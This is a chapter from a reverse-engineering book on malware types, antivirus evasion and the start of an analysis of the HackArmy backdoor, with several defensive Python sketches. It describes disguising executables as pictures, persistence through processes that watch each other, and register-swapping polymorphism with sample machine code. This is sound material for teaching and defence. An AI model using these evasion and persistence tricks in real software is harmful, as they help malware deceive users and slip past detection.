Chapter 8. Reversing Malware

Malicious software (or malware) is any program that works against the interests of the system's user or owner. Generally speaking, computer users expect the computer and all of the software running on it to work on their behalf. Any program that violates this rule is considered malware, because it works in the interest of other people. Sometimes the distinction can get fuzzy. Imagine what happens when a company CEO decides to spy on all company employees. There are numerous programs available that report all kinds of usage statistics and Web-browsing habits. These can be considered malware because they work against the interest of the system's end user and are often extremely difficult to remove.

This chapter introduces the concept of malware and describes the purpose of these programs and how they work. We will be getting into the different types of malware currently in existence, and we'll describe the various techniques they employ in hiding from end users and from antivirus programs.

This topic is related to reversing because reversing is the strongest weapon we, the good people, have against creators of malware. Antivirus researchers routinely engage in reversing sessions in order to analyze the latest malicious programs, determine just how dangerous they are, and learn their weaknesses so that effective antivirus programs can be developed. This chapter opens with a general discussion on some basic malware concepts, and proceeds to demonstrate the malware analysis process on real-world malware.

Types of Malware

Malicious code is so prevalent these days that there is widespread confusion regarding the different types of malware currently in existence. The following sections discuss the most popular types of malicious software and explain the differences between them and the dangers associated with them.

Viruses

Viruses are self-replicating programs that usually have a malicious intent. They are the oldest breed of malware and have become slightly less popular these days, now that there is the Internet. The unique thing about a virus that sets it apart from all other conventional programs is its self-replication. What other program do you know of that actually makes copies of itself whenever it gets the chance? Over the years, there have been many different kinds of viruses, some harmful ones that would delete valuable information or freeze the computer, and others that were harmless and would simply display annoying messages in an attempt to grab the user's attention.

Viruses typically attach themselves to executable program files (such as .exe files on Windows) and slowly duplicate themselves into many executable files on the infected system. As soon as an infected executable is somehow transferred and executed on another machine, that machine becomes infected as well. This means that viruses almost always require some kind of human interaction in order to replicate—they can't just "flow" into the machine next door. Actual viruses are considered pretty rare these days. The Internet is such an attractive replication medium for malicious software that almost every malicious program utilizes it in one way or another. A malicious program that uses the Internet to spread is typically called a worm.

Worms

A worm is fundamentally similar to a virus in the sense that it is a self-replicating malicious program. The difference is that a worm self-replicates using a network (such as the Internet), and the replication process doesn't require direct human interaction. It can take place in the background; the user doesn't even have to touch the computer. As you can probably imagine, worms have the (well-proven) potential to spread uncontrollably and in remarkably brief periods of time. In a world where almost every computer system is attached to the same network, worms can very easily search for and infect new systems.

Worms can spread using several different techniques. One method by which a modern worm spreads is taking advantage of certain operating system or application program vulnerabilities that allow it to hide in a seemingly innocent data packet. These are the vulnerabilities we discussed in Chapter 7, which can be utilized by attackers in a variety of ways, but they're most commonly used for developing malicious worms. Another common infection method for modern worms is e-mail. Mass mailing worms typically scan the user's contact list and mail themselves to every contact on such a list. It depends on the specific e-mail program, but in most cases the recipient will have to manually open the infected attachment in order for the worm to spread. Not so with vulnerability-based attacks; these rarely require an end-user operation to penetrate a system.

Trojan Horses

I'm sure you've heard the story about the Trojan horse. The general idea is that a Trojan horse is an innocent artifact openly delivered through the front door when it in fact contains a malicious element hidden somewhere inside of it. In the software world, this translates to seemingly innocent files that actually contain some kind of malicious code underneath. Most Trojans are actually functional programs, so that the user never becomes aware of the problem; the functional element in the program works just fine, while the malicious element works behind the user's back to promote the attacker's interests.

It's really quite easy to go about hiding unwanted functionality inside a useful program. The elegant way is to simply embed a malicious element inside an otherwise benign program. The victim then receives the infected program, launches it, and remains completely oblivious to the fact that the system has been infected. The original application continues to operate normally to eliminate any suspicion.

Another way to implement Trojans that is slightly less elegant (yet quite effective) is by simply fooling users into believing that a file containing a malicious program is really some kind of innocent file, such as a video clip or an image. This is particularly easy under Windows, where file types are determined by their extensions as opposed to actually examining their headers. This means that a remarkably silly trick such as hiding the file's real extension after a couple of hundred spaces actually works. Consider the following file name for example: "A Great Picture.jpg", followed by a long run of spaces, followed by ".exe". Depending on the program showing the file name, it might not have room to actually show this whole thing, so it might appear something like "A Great Picture.jpg . . .", essentially hiding the fact that the file is really a program, and not a JPEG picture. One problem with this trick is that Windows will usually still show a generic application icon for the file. However, when an executable contains its own icon, Windows shows that icon instead. All one would have to do is simply create an executable that has the default Windows picture icon as its program icon and name it something similar to my example.
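From the defender's side, the padded-extension trick is easy to spot mechanically. The following is a minimal sketch in Python of how a mail filter or file browser might flag such names. The two extension lists, the padding threshold, and the function names are my own assumptions for illustration and are not taken from any particular product.

```python
import re

# Assumed list of extensions that Windows launches as programs.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
# Assumed list of extensions that users tend to regard as harmless data.
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".avi", ".mpg", ".txt", ".doc"}


def real_extension(file_name: str) -> str:
    """Return the lowercase text from the last dot onward, which is what decides the file type."""
    stripped = file_name.rstrip()
    dot = stripped.rfind(".")
    return stripped[dot:].lower() if dot != -1 else ""


def looks_disguised(file_name: str) -> bool:
    """Flag executables whose names end in a decoy extension or contain long padding."""
    ext = real_extension(file_name)
    if ext not in EXECUTABLE_EXTENSIONS:
        return False
    stem = file_name.rstrip()[: -len(ext)]
    # A decoy extension right before the (possibly padded) real one.
    has_decoy = any(stem.rstrip().lower().endswith(d) for d in DECOY_EXTENSIONS)
    # Five or more consecutive whitespace characters is an arbitrary threshold.
    has_padding = re.search(r"\s{5,}", stem) is not None
    return has_decoy or has_padding


if __name__ == "__main__":
    tricky = "A Great Picture.jpg" + " " * 200 + ".exe"
    print(real_extension(tricky), looks_disguised(tricky))
    print(looks_disguised("setup.exe"), looks_disguised("holiday.jpg"))
```

A name check like this says nothing about the file's contents; it only catches the naming trick itself, so it would complement rather than replace an inspection of the file header.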

Backdoors

A backdoor is a type of malicious software that creates a (usually covert) access channel that the attacker can use for connecting, controlling, spying, or otherwise interacting with the victim's system. Some backdoors come in the form of actual programs that when executed can enable an attacker to remotely connect to the system and use it for a variety of activities. Other backdoors can actually be planted into the program source code right from the beginning by a rogue software developer. If you're thinking that software vendors double-check their source code before the product is shipped, think again. The general rule is that if it works, there's nothing to worry about. Even if the code was manually checked, it is possible to bury a backdoor deep within the source code, in a way that would require an extremely keen eye to notice. It is precisely these types of problems that make open-source software so attractive—these things rarely happen in open-source products.

Mobile Code

Mobile code is a class of benign programs that are specifically meant to be mobile and be executed on a large number of systems without being explicitly installed by end users. Most of today's mobile programs are designed to create a more active Web-browsing experience. This includes all kinds of interactive Java applets and ActiveX controls that allow Web sites to embed highly responsive animated content, 3-D presentations, and so on. Depending on the specific platform, these programs essentially enable Web sites to quickly download and launch a program on the end user's system. In most cases (but not all), the user receives a confirmation message saying a program is about to be installed and launched locally. Still, as mentioned earlier, many users seem to "automatically" click the confirmation button, without even considering the possibility that potentially malicious code is about to be downloaded into their system.

The term mobile code only determines how the code is distributed and not the technical details of how it is executed. Certain types of mobile code, such as JavaScript, are distributed in source code form, which makes them far easier to dissect. Others, such as ActiveX components, are conventional PE executables that contain native IA-32 machine code; these are probably the most difficult to analyze. Finally, some mobile code components, such as Java applets, are presented in bytecode form, which makes them highly vulnerable to decompilation and reverse engineering.

Adware/Spyware

This is a relatively new category of malicious programs that has become extremely popular. There are several different types of programs that are part of this category, but probably the most popular ones are the adware-type programs. Adware programs force unsolicited advertising on end users. The idea is that the program gathers various statistics regarding the end user's browsing and shopping habits (sometimes transmitting that data to a centralized server) and uses that information to display targeted ads to the end user. Adware is distributed in many ways, but the primary distribution method is to bundle the adware with free software. The free software is essentially funded by the advertisements displayed by the adware program.

There are several problems with these programs that effectively turn them into a major annoyance that can completely ruin the end-user experience on an infected system. First of all, in some programs the advertisements can appear out of nowhere, regardless of what the end user is doing. This can be highly distracting and annoying. Second, the way in which these programs interface with the operating system and with the Web browser is usually so aggressive and poorly implemented that many of these programs end up reducing the performance and robustness of the system. In Internet Explorer for example, it is not uncommon to see the browser on infected systems freeze for a long time just because a spyware DLL is poorly implemented and doesn't properly use multithreaded code. The interesting thing is that this is not intentional—the adware/spyware developers are simply careless, and they tend to produce buggy code.

Sticky Software

Some malicious programs, and especially spyware/adware programs that have a high user visibility, invest a lot of energy into preventing users from manually uninstalling them. One simple way to go about doing this is to simply not offer an uninstall program, but that's just the tip of the iceberg. Some programs go to great lengths to ensure that no one, especially no user (as opposed to a program that is specifically crafted for this purpose), can remove them.

Here is an example of how this is possible under Windows. It is possible to install registry keys that instruct Windows to always launch the malware as soon as the system is started. The program can constantly monitor those keys while it is running to make sure those keys are never deleted. If they are, the program can immediately reinstate them. The way to fight this trick from the user's perspective would be to try and terminate the program and then delete the keys. In such a case, the malware can use two separate processes, each monitoring the other. When one is terminated, the other immediately launches it again. This makes it quite difficult to get both of them to go away. Because both executables are always running, it also becomes very difficult to remove the executable files from the hard drive (because they are locked by the operating system).

Another approach is to scatter copies of the malware engine throughout various components in the system, such as Web browser add-ons and the like. Each of these components constantly ensures that none of the others has been removed. If one has been, it is reinstalled immediately.

Future Malware

Many people have said the following, and it is becoming quite obvious: today's malware is just the tip of the iceberg; it could be made far more destructive. In the future, malicious programs could take over computer systems at such low levels that it would be difficult to create any kind of antidote software simply because the malware would own the platform and would be able to control the antivirus program itself. Additionally, the concept of information-stealing worms could some day become a reality, allowing malware developers to steal their victim's valuable information and hold it for ransom!

The following sections discuss some futuristic malware concepts and attempt to assess their destructive potential.

Information-Stealing Worms

Cryptography is a wonderful thing, but in some cases it can be utilized to perpetrate malicious deeds. Present-day malware doesn't really use cryptography all that much, but this could easily change. Asymmetric encryption creates new possibilities for the creation of information-stealing worms [Young]. These are programs that could potentially spread like any other worm, except that they would locate valuable data on an infected system (such as documents, databases, and so on) and steal it. The actual theft would be performed by encrypting the data using an asymmetric cipher; asymmetric ciphers are encryption algorithms that use a pair of keys. One key (the public key) is used for encrypting the data and another (the private key) is used for decrypting the data. With a properly chosen key size, it is not computationally feasible to derive the private key from the public key.
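To make the key-pair idea concrete, here is a minimal sketch of textbook RSA, one well-known asymmetric cipher, written in Python. The tiny primes, the public exponent, and the function names are my own assumptions chosen so the arithmetic is easy to follow. With numbers this small anyone can factor the modulus and recover the private key, so the sketch illustrates only the relationship between the two keys and offers no security whatsoever.

```python
# Textbook RSA with deliberately tiny, assumed values (illustration only).
P, Q = 61, 53                # secret primes
N = P * Q                    # modulus, shared by both keys
PHI = (P - 1) * (Q - 1)      # Euler's totient of N
E = 17                       # public exponent, coprime with PHI
D = pow(E, -1, PHI)          # private exponent: modular inverse of E (Python 3.8+)


def encrypt(message: int) -> int:
    """Encrypt an integer smaller than N using the public key (E, N)."""
    return pow(message, E, N)


def decrypt(ciphertext: int) -> int:
    """Recover the integer using the private key (D, N)."""
    return pow(ciphertext, D, N)


if __name__ == "__main__":
    secret = 65
    scrambled = encrypt(secret)
    print(scrambled != secret, decrypt(scrambled) == secret)
```

Computing D requires PHI, and PHI requires the prime factors of N. With a modulus of realistic size, factoring N is considered infeasible, which is why knowing the public key does not reveal the private one.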

An information-stealing (or kleptographic) worm could simply embed an encryption key inside its body, and start encrypting every bit of data that appears to be valuable (certain file types that typically contain user data, and so on). By the time the end user realized what had happened, it would already be too late. There could be extremely valuable information sitting on the infected system that's as good as gone. Decryption of the data would not be possible—only the attacker would have the decryption key. This would open the door to a brand-new level of malicious software attacks: attackers could actually blackmail their victims.

Needless to say, actually implementing this idea is quite complicated. Probably the biggest challenge (from an attacker's perspective) would be to demand the ransom and successfully exchange the key for the ransom while maintaining full anonymity. Several theoretical approaches to these problems are discussed in [Young], including zero-knowledge proofs that could be used to allow an attacker to prove that he or she is in possession of the decryption key without actually exposing it.

BIOS/Firmware Malware

The basic premise of most malware defense strategies is to leverage the fact that there is always some kind of trusted element in the system. After all, how can an antivirus program detect a malicious program if it can't trust the underlying system? For instance, consider an antivirus program that scans the hard drive for infected files and simply uses high-level file-system services in order to read files from the hard drive and determine whether they are infected or not. A clever malicious program could relatively easily install itself as a file-system filter that would intercept the antivirus program's file system calls and present it with fake versions of the files on disk (these would usually be the original, uninfected versions of those files). It would simply hide the fact that it has infected numerous files on the hard drive from the antivirus program!

That is why most security and antivirus programs enter deep into the operating system kernel; they must reside at a low enough level so that malicious programs can't distort their view of the system by implementing file-system filtering or a similar approach.

Here is where things could get nasty. What would happen if a malicious program altered an extremely low-level component? This would be problematic because the antivirus programs would be running on top of this infected component and would have no way of knowing whether they are seeing an authentic picture of the system, or an artificial one painted by a malicious program that doesn't want to be found. Let's take a quick look at how this could be possible.

The lowest level at which a malicious program could theoretically infect a system is the CPU or other hardware devices that use upgradeable firmware. Most modern CPUs actually run very low-level code that implements each and every supported assembly language instruction using low-level instructions called micro-ops (μ-ops). The μ-op code that runs inside the processor is called firmware (it is also commonly referred to as microcode), and can usually be updated at the customer site using a special firmware-updating program. This is a sensible design decision since it enables software-level bug fixes that would otherwise require physically replacing the processor. The same goes for many hardware devices such as network and storage adapters. They are often based on programmable microcontrollers that support user-upgradeable firmware.

It is not exactly clear what a malicious program could do at the firmware level, if anything, but the prospects are quite chilling. Malicious firmware would theoretically be included as a part of a larger malicious program and could be used to hide the existence of the malicious program from security and antivirus programs. It would compromise the integrity of the only trustworthy component in a computer system: the hardware. In reality, it would not be easy to implement this kind of attack. The contents of firmware update files made for Intel processors appear to be encrypted (with the decryption key hidden safely inside the processor), and their exact contents are not known. For more information on this topic see Malware: Fighting Malicious Code by Ed Skoudis and Lenny Zeltser [Skoudis].

Uses of Malware

There are different types of motives that drive people to develop malicious programs. Some developers are interest-driven: The developer actually gains some kind of financial reward by spreading the programs. Others are motivated by certain psychological urges or by childish desires to beat the system. It is hard to classify malware in this way by just looking at what it does. For example, when you run into a malicious program that provides backdoor access to files on infected machines, you might never know whether the program was developed for stealing valuable corporate data or to allow the attacker to peep into some individual's personal files.

Let's take a look at the most typical purposes of malicious programs and try to discover what motivates people to develop them.

Backdoor Access: This is a popular end goal for many malicious programs. The attacker gets unlimited access to the infected machine and can use it for a variety of purposes.
Denial-of-Service (DoS) Attacks: These attacks are aimed at damaging a public server hosting a Web site or other publicly available resource. The attack is performed by simply programming all infected machines (which can be a huge number of systems) to try to connect to the target resource at the exact same time and simply keep on trying. In many cases, this causes the target server to become unavailable, either due to its Internet connection being saturated, or due to its own resources being exhausted. In these cases, there is typically no direct benefit to the attacker, except perhaps revenge. One direct benefit could occur if the owner of the server under attack were a direct business competitor of the attacker.
Vandalism: Sometimes people do things for pure vandalism. An attacker might gain satisfaction and self-importance from deleting a victim's precious files or causing other types of damage. People have a natural urge to make an impact on the world, and unfortunately some people don't care whether it's a negative or a positive impact.
Resource Theft: A malicious program can be used to steal other people's computing and networking resources. Once an attacker has a carefully crafted malicious program running on many systems, he or she can start utilizing these systems for extra computing power or extra network bandwidth.
Information Theft: Finally, malicious programs can easily be used for information theft. Once a malicious program penetrates into a host, it becomes exceedingly easy to steal files and personal information from that system. If you are wondering where a malicious program would send such valuable information without immediately exposing the attacker, the answer is that it would usually send it to another infected machine, from which the attacker could retrieve it without leaving any trace.

Malware Vulnerability

Malware suffers from the same basic problem as copy protection technologies: it runs on untrusted platforms and is therefore vulnerable to reversing. The logic and functionality that resides in a malicious program are essentially exposed for all to see. No encryption-based approach can address this problem because it is always going to have to remain possible for the system's CPU to decrypt and access any code or data in the program. Once the code is decrypted, it is going to be possible for malware researchers to analyze its code and behavior, and there is no easy way to get around this problem.

There are many ways to hide malicious software, some aimed at hiding it from end users, while others aim at hindering the process of reversing the program so that it survives longer in the wild. Hiding the program can be as simple as naming it in a way that would make end users think it is benign, or even embedding it in some operating system component, so that it becomes completely invisible to the end user.

Once the existence of a malicious program is detected, malware researchers are going to start analyzing and dissecting it. Most of this work revolves around conventional code reversing, but it also frequently relies on system tools such as network- and file-monitoring programs that expose the program's activities without forcing researchers to inspect the code manually. Still, the most powerful analysis method remains code-level analysis, and malware authors sometimes attempt to hinder this process by use of antireversing techniques. These are techniques that attempt to scramble and complicate the code in ways that prolong the analysis process. It is important to keep in mind that most of the techniques in this realm are quite limited and can only strive to complicate the process somewhat, but never to actually prevent it. Chapter 10 discusses these antireversing techniques in detail.

Polymorphism

The easiest way for antivirus programs to identify malicious programs is by using unique signatures. The antivirus program maintains a frequently updated database of virus signatures, which aims to contain a unique identification for every known malware program. This identification is based on a unique sequence of bytes that was found in a particular strain of the malicious program.
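In its most basic form, signature matching is nothing more than a substring search. The following Python sketch shows the idea under simplifying assumptions: the signature names and byte sequences are made up for illustration, and a real scanner would use a far larger database and a much faster multi-pattern search.

```python
from typing import List

# Hypothetical signature database: detection name -> identifying byte sequence.
SIGNATURES = {
    "Example.A": bytes.fromhex("8b45cc8b003345d8"),
    "Example.B": bytes.fromhex("deadbeef1337"),
}


def scan(data: bytes) -> List[str]:
    """Return the names of all signatures that occur anywhere in the data."""
    return sorted(name for name, pattern in SIGNATURES.items() if pattern in data)


if __name__ == "__main__":
    clean = b"just some ordinary file contents"
    infected = b"\x90" * 16 + SIGNATURES["Example.A"] + b"\xc3"
    print(scan(clean))
    print(scan(infected))
```

The weakness of this scheme follows directly from the code: changing a single byte inside the matched sequence is enough to make the search fail.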

Polymorphism is a technique that thwarts signature-based identification programs by randomly encoding or encrypting the program code in a way that maintains its original functionality. The simplest approach to polymorphism is based on encrypting the program using a random key and decrypting it at runtime. Depending on when an antivirus program scans the program for its signature, this might prevent accurate identification of a malicious program because each copy of it is entirely different (because it is encrypted using a random encryption key).

There are two significant weaknesses with these kinds of solutions. First of all, many antivirus programs might scan for virus signatures in memory. Because in most cases the program is going to be present in memory in its original, unencrypted form, the antivirus program won't have a problem matching the running program with the signature it has on file. The second weakness lies in the decryption code itself. Even if an antivirus program only uses on-disk files in order to match malware signatures, there is still the problem of the decryption code being static. For the program to actually be able to run, it must decrypt itself in memory, and it is this decryption code that could theoretically be used as the signature.
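The first weakness can be demonstrated on inert data. In the Python sketch below, a single-byte XOR stands in for whatever encryption a real program would use, and BODY is just an arbitrary byte string that is never executed; both are my assumptions for illustration. Two copies encoded with different keys share no signature on disk, yet both decode to identical bytes, which is exactly what a memory scan would see.

```python
import os

# Hypothetical signature and an inert byte string that contains it.
SIGNATURE = bytes.fromhex("8b45cc8b003345d8")
BODY = bytes.fromhex("558bec") + SIGNATURE + bytes.fromhex("c3")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def random_key() -> int:
    """Pick a random nonzero key (a key of 0 would leave the data unchanged)."""
    return os.urandom(1)[0] or 1


if __name__ == "__main__":
    key_a, key_b = 0x5A, 0xC3          # fixed keys so the run is repeatable
    copy_a, copy_b = xor_bytes(BODY, key_a), xor_bytes(BODY, key_b)
    print(copy_a != copy_b)                                  # on-disk forms differ
    print(SIGNATURE in copy_a, SIGNATURE in copy_b)          # on-disk scan misses
    print(SIGNATURE in xor_bytes(copy_a, key_a))             # decoded form matches
```

The sketch leaves out the decoder itself, which is the second weakness described above: the decoding routine has to exist in plain form in every copy, so it can serve as a signature unless it is varied as well.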

The solution to these problems generally revolves around rotating or scrambling certain elements in the decryption code (or in the entire program) in ways that alter its signature yet preserve its original functionality. Consider the following sequence as an example:

0040343B    8B45 CC        MOV EAX,[EBP-34]
0040343E    8B00           MOV EAX,[EAX]
00403440    3345 D8        XOR EAX,[EBP-28]
00403443    8B4D CC        MOV ECX,[EBP-34]
00403446    8901           MOV [ECX],EAX
00403448    8B45 D4        MOV EAX,[EBP-2C]
0040344B    8945 D8        MOV [EBP-28],EAX
0040344E    8B45 DC        MOV EAX,[EBP-24]
00403451    3345 D4        XOR EAX,[EBP-2C]
00403454    8945 DC        MOV [EBP-24],EAX

One almost trivial method that would make it a bit more difficult to identify this sequence would consist of simply randomizing the use of registers in the code. The code sequence uses registers separately at several different phases. Consider, for example, the instructions at 00403448 and 0040344E. Both instructions load a value into EAX, which is used in instructions that follow. It would be quite easy to modify these instructions so that the first uses one register and the second uses another register. It is even quite easy to change the base stack frame pointer (EBP) to use another general-purpose register.

Of course, you could change far more than just registers (see the following section on metamorphism), but restricting the modification to something like register usage makes it possible to write fairly trivial routines that simply know in advance which bytes should be modified in order to alter register usage. It would all be hard-coded, and the specific registers would be selected randomly at runtime. The result might look like this:

0040343B    8B57 CC        MOV EDX,[EDI-34]
0040343E    8B02           MOV EAX,[EDX]
00403440    3347 D8        XOR EAX,[EDI-28]
00403443    8B5F CC        MOV EBX,[EDI-34]
00403446    8903           MOV [EBX],EAX
00403448    8B77 D4        MOV ESI,[EDI-2C]
0040344B    8977 D8        MOV [EDI-28],ESI
0040344E    8B4F DC        MOV ECX,[EDI-24]
00403451    334F D4        XOR ECX,[EDI-2C]
00403454    894F DC        MOV [EDI-24],ECX

This code provides an equivalent-functionality alternative to the original sequence. The only bytes that have changed from the original representation are the second byte of each instruction (the ModR/M byte, which encodes the register operands); the opcodes and stack offsets are untouched. To simplify the implementation of such a transformation, it is feasible to simply store a list of predefined bytes that could be altered and in what way they can be altered. The program could then randomly fiddle with the available combinations during the self-replication process and generate a unique machine code sequence. Because this kind of implementation requires the creation of a table of hard-coded information regarding the specific code bytes that can be altered, this approach would only be feasible when most of the program is encrypted or encoded in some way, as described earlier. It would not be practical to manually scramble an entire program in this fashion. Additionally, it goes without saying that all registers must be saved and restored before entering a function that can be polymorphed in this fashion.
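The relationship between the two listings can be checked mechanically. The Python sketch below decodes the ModR/M byte of each instruction and confirms that the two sequences agree on everything except the register fields. The decoder is my own simplification: it assumes a one-byte opcode followed directly by a ModR/M byte and an optional 8-bit displacement, which holds for every instruction in these listings but not for IA-32 code in general.

```python
# Machine code bytes copied from the two listings, one instruction per token.
ORIGINAL = "8B45CC 8B00 3345D8 8B4DCC 8901 8B45D4 8945D8 8B45DC 3345D4 8945DC"
VARIANT = "8B57CC 8B02 3347D8 8B5FCC 8903 8B77D4 8977D8 8B4FDC 334FD4 894FDC"

# IA-32 register numbering as used in the ModR/M reg and r/m fields.
REGS = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


def decode(instr_hex: str):
    """Split an instruction into (opcode, mod, reg, rm, displacement bytes)."""
    raw = bytes.fromhex(instr_hex)
    opcode, modrm, rest = raw[0], raw[1], raw[2:]
    mod = modrm >> 6                 # addressing mode (00 = [reg], 01 = [reg+disp8])
    reg = REGS[(modrm >> 3) & 7]     # register operand
    rm = REGS[modrm & 7]             # base register of the memory operand
    return opcode, mod, reg, rm, rest


def same_shape(a: str, b: str) -> bool:
    """True when two instructions differ at most in their register fields."""
    op_a, mod_a, _, _, rest_a = decode(a)
    op_b, mod_b, _, _, rest_b = decode(b)
    return (op_a, mod_a, rest_a) == (op_b, mod_b, rest_b)


def register_blind_match(first: str, second: str) -> bool:
    """Compare two sequences while ignoring which registers they use."""
    a, b = first.split(), second.split()
    return len(a) == len(b) and all(same_shape(x, y) for x, y in zip(a, b))


if __name__ == "__main__":
    print(decode("8B45CC")[2:4], decode("8B57CC")[2:4])
    print(register_blind_match(ORIGINAL, VARIANT))
```

A comparison of this kind is also a hint at how limited register swapping is as a disguise: a scanner that masks out the register fields before matching would treat both sequences as the same code.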

Metamorphism

Because polymorphism is limited to very superficial modifications on the malware's decryption code, there are still plenty of ways for antivirus programs to identify polymorphed code by analyzing the code and extracting certain high-level information from it.

This is where metamorphism enters into the picture. Metamorphism is the next logical step after polymorphism. Instead of encrypting the program's body and making slight alterations in the decryption engine, it is possible to alter the entire program each time it is replicated. The benefit of metamorphism (from a malware writer's perspective) is that each version of the malware can look radically different from any other version. This makes it very difficult (if not impossible) for antivirus writers to use any kind of signature-matching techniques for identifying the malicious program.

Metamorphism requires a powerful code analysis engine that actually needs to be embedded into the malicious program. This engine scans the program code and regenerates a different version of it on the fly every time the program is duplicated. The clever part here is the type of changes made to the program. A metamorphic engine can perform a wide variety of alterations on the malicious program (needless to say, the alterations are performed on the entire malicious program, including the metamorphic engine itself). Let's take a look at some of the alterations that can be automatically applied to a program by a metamorphic engine.

Instruction and Register Selection: Metamorphic engines can actually analyze the malicious program in its entirety and regenerate the code for the entire program. While reemitting the code the metamorphic engine can randomize a variety of parameters regarding the code, including the specific selection of instructions (there is usually more than one instruction that can be used for performing any single operation), and the selection of registers.
Instruction Ordering: Metamorphic engines can sometimes randomly alter the order of instructions within a function, as long as the instructions in question are independent of one another.
Reversing Conditions: In order to seriously alter the malware code, a metamorphic engine can actually reverse some of the conditional statements used in the program. Reversing a condition means (for example) that instead of using a statement that checks whether two operands are equal, you check whether they are unequal (this is routinely done by compilers in the compilation process; see Appendix A). This results in a significant rearrangement of the program's code because it forces the metamorphic engine to relocate conditional blocks within a single function. The idea is that even if the antivirus program employs some kind of high-level scanning of the program in anticipation of a metamorphic engine, it would still have a hard time identifying the program.
Garbage Insertion: It is possible to randomly insert garbage instructions that manipulate irrelevant data throughout the program in order to further confuse antivirus scanners. This also adds a certain amount of confusion for human reversers that attempt to analyze the metamorphic program.
Function Order: The order in which functions are stored in the module matters very little to the program at runtime, and randomizing it can make the program somewhat more difficult to identify.
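The notion of instructions being "independent of one another" is the same one a compiler's instruction scheduler relies on, and an analyst can use it to recognize that two differently ordered sequences are equivalent. The Python sketch below expresses the usual test (often called Bernstein's conditions): two instructions may be swapped when neither writes a location that the other reads or writes. The Instr type and the hand-written read/write sets are my own assumptions; a real tool would derive them from a disassembler and would also have to account for the flags register and for memory operands that alias each other.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Instr:
    text: str
    reads: frozenset    # locations the instruction reads
    writes: frozenset   # locations the instruction modifies


def instr(text, reads, writes) -> Instr:
    """Convenience constructor that accepts ordinary sets."""
    return Instr(text, frozenset(reads), frozenset(writes))


def independent(a: Instr, b: Instr) -> bool:
    """True when swapping a and b cannot change the result of either one."""
    a_disturbs_b = a.writes & (b.reads | b.writes)
    b_disturbs_a = b.writes & a.reads
    return not a_disturbs_b and not b_disturbs_a


# Three instructions in the style of the earlier listing, annotated by hand.
load_value = instr("MOV EAX,[EBP-2C]", {"EBP", "[EBP-2C]"}, {"EAX"})
store_value = instr("MOV [EBP-28],EAX", {"EBP", "EAX"}, {"[EBP-28]"})
load_pointer = instr("MOV ECX,[EBP-34]", {"EBP", "[EBP-34]"}, {"ECX"})

if __name__ == "__main__":
    print(independent(load_value, store_value))    # store depends on the load
    print(independent(load_value, load_pointer))   # no shared written location
```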

To summarize, by combining all of the previously mentioned techniques (and possibly a few others), metamorphic engines can create some truly flexible malware that can be very difficult to locate and identify.

Establishing a Secure Environment

The remainder of this chapter is dedicated to describing a reversing session of an actual malicious program. I've intentionally made the discussion quite detailed, so that readers who aren't properly set up to try this at home won't have to. I would only recommend that you try this out if you can allocate a dedicated machine that is not connected to any network, either local or the Internet. It is also possible to use a virtual machine product such as Microsoft Virtual PC or VMware Workstation, but you must make sure the virtual machine is completely detached from the host and from the Internet. If your virtual machine is connected to a network, make sure that network is connected to neither the Internet nor the host.

If you need to transfer any executables (such as the malicious program itself) from your primary system into the test system you should use a recordable CD or DVD, just to make sure the malicious program can't replicate itself into that disc and infect other systems. Also, when you store the malicious program on your hard drive or on a recordable CD, it might be wise to rename it with a nonexecutable extension, so that it doesn't get accidentally launched.

The HackArmy backdoor dissected in the following pages can be downloaded at this book's Web site at www.wiley.com/eeilam.

The HackArmy Backdoor

The HackArmy Trojan/Backdoor is the program I've chosen as our malware case study. It is relatively simple malware that is reasonably easy to reverse, and most importantly, it lacks any automated self-replication mechanisms. This is important because it means that there is no risk of this program spreading further because of your attempts to study it. Keep in mind that this is no reason to skimp on the security measures I discussed in the previous section. This is still a malicious program, and as such it should be treated with respect.

The program is essentially a Trojan because it is frequently distributed as an innocent picture file. The file is called a variety of names. My particular copy was named Webcam Shots.scr. The SCR extension is reserved for screen savers, but screensavers are really just regular programs; you could theoretically create a word processor with an .scr extension—it would work just fine. The reason this little trick is effective is that some programs (such as e-mail clients) stupidly give these files a little bitmap icon instead of an application icon, so the user might actually think that they're pictures, when in fact they are programs. One trivial solution is to simply display a special alert that notifies the user when an executable is being downloaded via Web or e-mail. The specific file name that is used for distributing this file really varies. In some e-mail messages (typically sent to news groups) the program is disguised as a picture of soccer star David Beckham, while other messages claim that the file contains proof that Nick Berg, an American civilian who was murdered in Iraq in May of 2004, is still alive. In all messages, the purpose of both the message and the file name is to persuade the unsuspecting user to open the attachment and activate the backdoor.

Unpacking the Executable

As with every executable, you begin by dumping its basic headers and import/export entries. You do this by running it through DUMPBIN or a similar program. The output from DUMPBIN is shown in Listing 8.1.

Example 8.1. An abridged DUMPBIN output for the HackArmy backdoor.

Microsoft (R) COFF/PE Dumper Version 7.10.3077
Copyright (C) Microsoft Corporation. All rights reserved.

Dump of file Webcam Shots.scr

File Type: EXECUTABLE IMAGE

   Section contains the following imports:

     KERNEL32.DLL

                    0 LoadLibraryA
                    0 GetProcAddress
                    0 ExitProcess

     ADVAPI32.DLL
                    0 RegCloseKey

     CRTDLL.DLL
                    0 atoi

     SHELL32.DLL
                    0 ShellExecuteA

     USER32.DLL
                    0 CharUpperBuffA

     WININET.DLL
                    0 InternetOpenA

     WS2_32.DLL
                    0 bind

   Summary

         3000 .rsrc
         9000 UPX0
         2000 UPX1

This output exhibits several unusual properties regarding the executable. First of all, there are quite a few DLLs that only have a single import entry—that is highly irregular and really makes no sense. What would the program be able to do with the Winsock 2 binary WS2_32.DLL if it only called the bind API? Not much. The same goes for CRTDLL.DLL, ADVAPI32.DLL, and the rest of the DLLs listed in the import table. The revealing detail here is the Summary section near the end of the listing. One would expect a section called .text that would contain the program code, but there is no such section. Instead there is the traditional .rsrc resource section, and two unrecognized sections called UPX0 and UPX1.
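The section check can also be done without DUMPBIN. The following is a minimal sketch, assuming a well-formed PE file held in memory; the function names pe_section_names and looks_upx_packed are hypothetical, and the name test is only a heuristic, because the default UPX0 and UPX1 names can be changed after packing.

```python
import struct


def pe_section_names(image: bytes) -> list:
    """Return the section names listed in a PE file's section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
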